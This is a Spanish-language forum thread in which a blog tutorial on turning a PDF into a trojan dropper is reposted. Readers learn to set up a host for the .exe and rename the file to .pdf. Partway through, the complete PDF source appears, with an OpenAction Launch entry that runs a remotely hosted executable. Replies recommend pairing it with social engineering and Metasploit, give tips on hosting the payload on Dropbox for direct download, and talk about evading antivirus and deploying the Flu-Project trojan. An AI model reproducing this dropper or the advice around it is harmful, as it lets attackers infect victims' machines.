Tras una semana sin entradas en blog, traigo un método de ejecutar .exe en un PDF muy interesante. Cabe destacar que el método no es de mi elaboración.
Por otra parte, quiero dar gracias a los nuevos seguidores de
@seguridaddelmal (http://twitter.com/#!/seguridaddelmal) y pedir perdón por la ausencia de entradas durante estos días pero es que estoy bastante ocupado últimamente!
Empezamos y requisitos:
- Un .exe para ejecutar(troyano, etc.)
- Un host, donde subiremos el .exe
Abrimos nuestro bloc de notas o bien si tienen
Notepad++ (http://notepad-plus-plus.org/) (lo recomiendo) y pegamos el siguiente
código (http://pastebin.com/gFqbTVTa).
(http://1.bp.blogspot.com/-k6SC1FCGaVY/T66O5zGvm4I/AAAAAAAABpA/tbzsjxOXcAk/s400/sshot-1.png) (http://1.bp.blogspot.com/-k6SC1FCGaVY/T66O5zGvm4I/AAAAAAAABpA/tbzsjxOXcAk/s1600/sshot-1.png"%20imageanchor=1)
Ahora nos toca retocar un par de cosas, la primera el texto que aparecerá al ejecutar el PDF. Se encuentra en esta parte del código, cada uno pone lo que desee.
(http://1.bp.blogspot.com/-EqFYWeoqWFY/T66QChVvazI/AAAAAAAABpI/aMhqxqrucgQ/s400/sshot-1.png) (http://1.bp.blogspot.com/-EqFYWeoqWFY/T66QChVvazI/AAAAAAAABpI/aMhqxqrucgQ/s1600/sshot-1.png"%20imageanchor=1)
La segunda es editar la url del host, donde estará el .exe a ejecutar. Pueden usar
000webhost (http://www.000webhost.com/) como host gratuito, yo usaré localhost....Como es normal el .exe que uso en este método y otros es el troyano
Flu-Project (http://www.flu-project.com/sobre-flu).
(http://2.bp.blogspot.com/-FWD2VkJJ2o0/T66SkqOLyXI/AAAAAAAABpU/2YkVXF4hEvs/s400/sshot-2.png) (http://2.bp.blogspot.com/-FWD2VkJJ2o0/T66SkqOLyXI/AAAAAAAABpU/2YkVXF4hEvs/s1600/sshot-2.png"%20imageanchor=1)
Por ultimo, guardan todo el código con extensión .pdf
(http://4.bp.blogspot.com/-PngqOY9FNPc/T66TXbq08kI/AAAAAAAABpc/VuRqoU958ng/s400/sshot-3.png) (http://4.bp.blogspot.com/-PngqOY9FNPc/T66TXbq08kI/AAAAAAAABpc/VuRqoU958ng/s1600/sshot-3.png"%20imageanchor=1)
Una vez guardado en .pdf, lo ejecuto para comprobar la funcionalidad del método explicado.
(http://3.bp.blogspot.com/-GP0UWScPJ2c/T66UKiAyB-I/AAAAAAAABpk/mxSR99r8u1U/s400/sshot-1.png) (http://3.bp.blogspot.com/-GP0UWScPJ2c/T66UKiAyB-I/AAAAAAAABpk/mxSR99r8u1U/s1600/sshot-1.png"%20imageanchor=1)
Sean buenos con el uso del método!!
JchieroFuente: seguridaddelmal.com
Ola Stiuvert podrias colocar el codigo completo. Gracias.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Ola Stiuvert podrias colocar el codigo completo. Gracias.
Lo tienes aquí:
http://pastebin.com/gFqbTVTa
Jajajaj esta bueno ;D
pero siempre que se abra el pdf
saldra ese mensaje?
saludos :)
Stiuvert tengo problemas con el Flu-Project.
cuando subo la db a una pagina que tengo me sale esto => http://i48.tinypic.com/245n61j.png
:'(
Lo haces correctamente desde phpmyadmin en el sitio que dice "importar" ?
de hecho le doy a importar y me vota ese error, tambien lo probe desde wampserver (localhost) ahi si normal pero yo lo quiero para hacerlo desde mi web para otras personas fuera de mi red lan
Borra todas las bases de datos y le das a importar para crear la BD que subes.
exelente aporte probando jejeje
Buen aporte, hace años que utilizo esta tecnica es bastante efectiva con un poco de ingeneria social y quizas con un poco de metasploit. ;)
Gracias por aportarla al foro ,saludos
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Ola Stiuvert podrias colocar el codigo completo. Gracias.
Lo tienes aquí:
http://pastebin.com/gFqbTVTa
Serias tan amable de pasarme el codigo porque el pastebin que colocaste me da error al querer habrirlo en el navegador.
Muchas gracias
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 8 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources
<< /ProcSet 6 0 R
/Font << /F1 7 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Seguridaddelmal | www.seguridaddelmal.com | @seguridaddelmal)Tj
ET
endstream
endobj
6 0 obj
[/PDF /Text]
endobj
7 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
8 0 obj
<<
/Type /Action
/S /Launch
/Win
<<
/F (http://www.host/nombre.exe)
>>
>>
endobj
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
/Size 9
/Root 1 0 R
>>
startxref
751
%%EOF
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Jajajaj esta bueno ;D
pero siempre que se abra el pdf
saldra ese mensaje?
saludos :)
Me uno a la duda del compañero. ¿saldrá ese mensaje cada vez que se abra el PDF?
saludos y gracias por la información. 8)
Siempre aparecerá dicho mensaje ya sea por ello o bien si embebes otro archivo mas adicional
Hola! aun se puede realizar esto?
Estoy intentando subir un archivo .exe pero donde probe me tira error. alguna sitio para recomendar para poder subir los .exe directo?
Gracias, saludos
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
alguna sitio para recomendar para poder subir los .exe directo?
Dropbox creo que es la mejor opción, te permitirá descargarlo automáticamente.
Un saludo
Gracias! Hace unos dias intente con Dropbox, pero no me generaba un enlace directo con descarga. Sino como su portal de descarga.
Voy a volvear a chequiarlo, gracias
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Gracias! Hace unos dias intente con Dropbox, pero no me generaba un enlace directo con descarga. Sino como su portal de descarga.
Subelo a la carpeta "publico".
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Gracias! Hace unos dias intente con Dropbox, pero no me generaba un enlace directo con descarga. Sino como su portal de descarga.
Subelo a la carpeta "publico".
Voy a intentar nuevamente y aviso, gracias!
Un grande aporte en verdad,muchas gracias por compartirlo,y saludos a todos
disculpen, pero esta ready este method A esta fecha? septiembre 2016?
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
disculpen, pero esta ready este method A esta fecha? septiembre 2016?
@vomitus (https://underc0de.org/foro/index.php?action=profile;u=30827)En el post original tienes la fecha, posiblemente ya esté es obsoleto; pero puedes probar y nos comentas.
Saludos
Gabriela
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
disculpen, pero esta ready este method A esta fecha? septiembre 2016?
Todo método es aun posible, lo imposible es que detecte el AV pero para ello toca hacer prueba y error ademas de corroborar por tu cuenta si es valido o no, vamos un poco de investigación no afecta a nadie.
Regards,
Snifer